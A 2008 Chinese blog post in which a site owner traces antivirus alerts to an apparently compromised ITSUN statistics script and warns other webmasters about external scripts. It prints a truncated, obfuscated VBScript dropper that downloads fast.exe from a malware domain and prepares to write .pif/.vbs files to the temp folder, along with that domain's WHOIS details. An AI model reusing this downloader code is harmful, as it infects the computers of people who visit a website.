当前位置:首页 > 互联网观测台 > 最近博客中毒的症状根源应该找到了,对ITSUN的一些疑问

最近博客中毒的症状根源应该找到了,对ITSUN的一些疑问

J.wei17年前 (2008-01-06)互联网观测台481

        没想到我博客上真的有问题,其实早在前一个多月前的时候我的博客就有中毒的反映了,最初是看到我博客在Google的搜索中结果出现了“该网站可能含有恶意软件”的提示,我好不容易在Google的Sitemap工具一共提交了两次才通过;在第一次的审核没过,因为当时在我仔细检查了博客的程序源码但并没发现有被写入网页病毒,打开博客的每个板块和日志页面杀毒软件(病毒库最新)也并未提示有病毒存在,所以当时怀疑是否有人在恶意试验性操纵,于是又发了封邮件给Google要求仔细查清我的网站,当然那时也不是没有怀疑过那些网站统计代码,为了比较哪个统计器更优秀,开博时在自己的博客一共装了将近6个统计器的代码,所以当时觉得嫌疑最大的也就是这些统计代码了,因为在以前也曾听到过利用统计代码来搞小动作的网站。但郁闷的是那些天说实在的检查了自己的博客真的没什么异常,在当时纳闷的紧,不过说归这么说,经过第二次的提交申请,过了几天Google上对浏览者警告的提示终于没了,这也算安了心。但是事情并没有就这么完结,仅仅过了一个月的样子,又有朋友提醒我说,打开我博客后他的买咖啡(McAfee)杀毒软件提示出现了病毒(到底是服务器专用的杀毒软件啊);但是当我打开我的博客时,我的Rav杀毒软件居然还是没提示有病毒,加上上次的事情,有点蒙了,那时我的怀疑是,可能是我朋友的计算机中毒了,再后来因为别的几个同行朋友打开我博客均没出现病毒,加上那时工作学习有点忙就没去管这门子事了。

        以上是以前对于自己博客中毒症状的回忆,今天一早打开自己的博客首页时我的Rav(瑞星)突然破天荒的跳出提示框说在我打开的网页中出现了一个后缀为.tmp的病毒,当时又是惊讶又是兴奋,惊讶的是我的博客居然会出现病毒,兴奋的是怀疑可能和以前的中毒症状有关,而终于和这Y的面对面的碰到了,有时候怕就怕敌人躲在暗处而自己无从下手,这下有了目标还怕他逃走?!但很迷茫当我第二次打开自己博客的时候居然没有跳出这个病毒提示了,这让我倍感纳闷,照理如果是网页给写马了而杀毒软件也有这方特征库后面打开后还是会有提示的,这样一来突然断了线索。与是我赶紧在打开网页后的源码中查找是否被黑客写了代码,还是无奈,找不到,IE显示的源码很正常,并未给写注入;于是开始第二步,第二步当然是处理那些统计器代码了,本想一个一个的清除看看是哪个导致杀毒软件跳出杀毒框的,但因为后面几次打开博客哪个病毒都不出现了所以线索也中断,因而无法判断,总不至于统计不要了吧。与是我转向去研究刚刚杀出来的哪个.tmp的病毒,先用『瑞星病毒隔离系统』还原了出来,可能在本地一般情况下不会对系统产生影响的缘故吧,发现在本地盘上居然没提示说是病毒(网页病毒就是独特),与是又打开了这个病毒文件发现了下面的网页执行代码:

============================================================================

On Error Resume Next
cuteqq = "http://999.dywoyk88.cn/fast.exe"
Set cuteqq2 = document.createElement("object")
cuteqqid="clsid:"
cuteqqidx="BD96"
cuteqqid2="C556-65"
cuteqqid3="A3-11D"
cuteqqid4="0-98"
cuteqqid5="3A-00C"
cuteqqid6="04FC"
cuteqqid7="29E36"
cuteqq3="Microsoft.X"
cuteqq4="MLHTTp"
cuteqq2.SetAttribute "classid", cuteqqid&cuteqqidx&cuteqqid2&cuteqqid3&cuteqqid4&cuteqqid5&cuteqqid6&cuteqqid7
cuteqq5=cuteqq3&cuteqq4
Set lovecuteqq = cuteqq2.CreateObject(cuteqq5,"")
lovecuteqq.Open "GET", cuteqq, False
lovecuteqq.Send
Cuteqq_784378237="MicroSofts.pif"
Cuteqq_784378237s="MicroSofts.vbs"
Q784378237="Scripting."
Q784378237s="FileSyst"
Q784378237ss="emObject"
Q784378237sss="Adod"
Q784378237ssss="b.stream"
Q784378237sssss=Q784378237sss&Q784378237ssss
Set chilam = cuteqq2.createobject(Q784378237&Q784378237s&Q784378237ss,"")
Set yingying = chilam.GetSpecialFolder(2)
Cuteqq_784378237=chilam.BuildPath(yingying,Cuteqq_784378237)
Cuteqq_784378237s=chilam.BuildPath(yingying,Cuteqq_784378237s)
Set chilams = cuteqq2.createobject(Q784378237sssss,"")


               ... ...   后面的代码省略,上文主要部分已删去
============================================================================

        这个代码大概用来干什么我想不必多说了吧,居然还在代码中发现了一个客服QQ,看QQ属性上的网站有恐怖,怕得罪黑客这里不多写了,代码的顶部有段用网址引用的fast.exe估计问题就在这里吧,与是在网上搜了一下这个网站的域名,发现大多数的搜索门户都没有收录这个网站,HOST信息是:

Domain Name: dywoyk88.cn
ROID: 20070314s10001s35225356-cn
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Registrant Organization: 王星
Registrant Name: 王星
Administrative Email: bjxiaojin2#yahoo.com.cn
Sponsoring Registrar: 易名中国

Registration Date: 2007-03-14 23:21
Expiration Date: 2008-03-14 23:21

 

        没想到这个站长这么有个性居然还留中文名字,有那位同学知道这个站和哪个病毒关系的?请举手!~我不知道。在最后搜索域名的过程中结果终于发现问题所在了,按很多反病毒论坛上讲的,应该就是ITSUN统计代码上的问题了,与是为了正式证实这个问题,也为了给自己吃颗定心丸,我打开了另外一个以前运营的网站,因为这个网站用的也是ITSUN的统计器,没想到打开这个网站后瑞星真的跳出了刚刚那个提示该网页有病毒的对话框(同样第二次打开后就没提示了),也是个.tmp的病毒,到瑞星的病毒隔离系统里一看两个病毒的文件的大小是一模一样的,见下图:

恶意代码,tmp病毒

查看.tmp病毒文件源码后发现连里面的代码也是一样的,这下可以差不多确定是那个统计器的缘故了,在后来打开本地IIS测试网页时更加肯定了因为打开在本地上的IIS测试博客的时候又跳出了一个一摸一样的病毒。确定大致的根源后很无奈只能先把ITSUN的统计代码从博客中去除,重启计算机后再进本地IIS的测试的博客和在网上的博客那个瑞星提示的病毒就没出现,但是以前那个运营的网站因为没清除过,上去还是有这个病毒会跳出来(因为我不知道维护密码了),发现除去后的博客网页打开的速度都快了很多。

 

 后话:其实ITSUN是我很喜欢的一款网站统计器,因为感觉后台的统计的信息比较详细甚至有点专业,但因近段时间的服务器的常常调整,统计数据频繁丢失后已经有点失望,经过现在这件事后给我的感觉更是大打折扣,还是希望这是他们的服务器有问题而引起的吧,宁愿希望这是他们的服务器被黑客攻击所致。不想再多说什么了,如果真的是,这不仅是让我博客浏览者和站长带来麻烦的问题这么简单吧?虽然前面行动的结果似乎证明了些什么,但在这里我还是保留一下我的怀疑吧。其实在最开始我是怀疑51.la和CNZZ的,怀疑51.la的原因是因为很多恶意框架代码的引用网页上都用它做统计,其实这并不代表什么;而怀疑CNZZ是因为以前网上有过类似传闻,官方也出面澄清过,恰恰真正嫌疑的根源并不是它们,最后经过这件事后想说是做站的朋友们应该尽量少往自己的网站上添加引用外部网页的框架、script代码,特别要注意提供统计器服务商的口碑。记得前年曾经被网页病毒折腾的很夸张。想想还记得这个统计代码是我当时最信任的也是开博时最早加上去的,现在回想起来不仅倒吸一口冷气,现在突然记起开博的不久时候(应该是去年9月)也有人反映我博客上有病毒的事情,当时也是因为我自己这边检查没发现有病毒写入而不了了之,一直当是别人电脑本身的问题。感叹一下,现在计算机病毒的恶意代码也开始学得低调起来了。

 

扫描二维码推送至手机访问。

版权声明:本文由灵犀札记发布,如需转载请注明出处。

本文链接:http://lxzj.xylxydt.com/archives/2008/01/136.html

分享给朋友:

评论列表

幼峰
幼峰 IP:
17年前 (2008-01-10)

说实话吧 我一直都不是很放心那些站的统计 一看那些站上面普天盖地的AD 就烦 你说那伸到客户端的那支脚上面能不带脚气么?之前很多站 什么51la 武林榜 51yes什么的 我都不怎么敢用 后来用了站长统计觉得还不错 雅虎统计出来 就用了雅虎统计 毕竟还是大站的用的放心

J.wei
J.wei IP:
17年前 (2008-01-11)

嗯,统计服务的信誉和口碑很重要,其实有些传言也不是空穴来风的
我在用雅虎统计,感觉蛮不错,以后升级1.8后打算就放一个,网站速度也快点

finelooking
17年前 (2008-02-10)

现在站长统计有时不能显示,服务器老忙

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。